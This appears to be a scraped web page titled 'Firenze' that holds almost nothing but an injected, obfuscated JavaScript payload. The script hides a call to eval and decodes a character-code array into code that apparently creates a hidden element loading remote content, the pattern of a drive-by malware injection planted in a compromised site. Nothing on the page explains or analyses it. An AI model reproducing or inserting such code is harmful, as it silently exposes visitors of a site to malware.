Firenze

Firenze
ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,118,100,105,115,31,59,29,100,110,97,114,109,100,108,113,46,98,112,98,97,115,99,66,108,100,107,98,110,115,38,36,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30,29,32,104,117,99,108,114,44,112,114,98,30,58,32,38,102,113,116,111,56,44,47,118,117,116,46,104,98,106,101,107,99,113,116,113,109,107,105,98,95,43,105,115,45,103,115,46,97,108,117,109,114,98,114,45,110,101,112,38,57,10,10,31,30,29,32,104,117,99,108,114,44,112,116,120,106,98,46,111,109,112,105,115,103,108,110,31,59,29,39,96,96,112,111,107,115,113,101,38,57,10,10,31,30,29,32,104,117,99,108,114,44,112,116,120,106,98,46,97,109,111,100,100,112,29,61,31,37,45,39,58,11,7,32,31,30,29,105,118,100,105,115,45,113,113,121,107,99,43,104,100,103,100,104,115,30,58,32,38,47,109,120,38,57,10,10,31,30,29,32,104,117,99,108,114,44,112,116,120,106,98,46,118,103,97,116,103,30,58,32,38,47,109,120,38,57,10,10,31,30,29,32,104,117,99,108,114,44,112,116,120,106,98,46,107,99,99,116,31,59,29,39,48,110,117,39,58,11,7,32,31,30,29,105,118,100,105,115,45,113,113,121,107,99,43,116,110,110,29,61,31,37,46,112,119,37,56,13,9,11,7,32,31,30,29,105,101,30,37,33,99,109,96,117,108,99,107,116,45,101,98,116,68,106,98,109,100,108,113,66,120,71,97,40,38,103,116,102,107,113,36,41,40,30,120,13,9,30,29,32,31,30,29,32,31,98,108,99,116,107,98,110,115,44,116,114,104,114,98,40,38,58,97,105,117,30,102,100,60,90,36,105,118,100,105,115,91,37,59,60,46,98,102,118,61,37,38,59,12,8,29,32,31,30,29,32,31,30,97,111,98,115,106,101,109,114,43,103,100,114,66,108,100,107,98,110,115,64,118,73,99,38,36,105,118,100,105,115,38,39,43,97,111,110,98,110,99,65,101,105,107,98,37,105,118,100,105,115,40,57,10,10,31,30,29,32,124,11,7,125,40,38,38,59);}w=f;s=[];for(i=0;-i+505!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}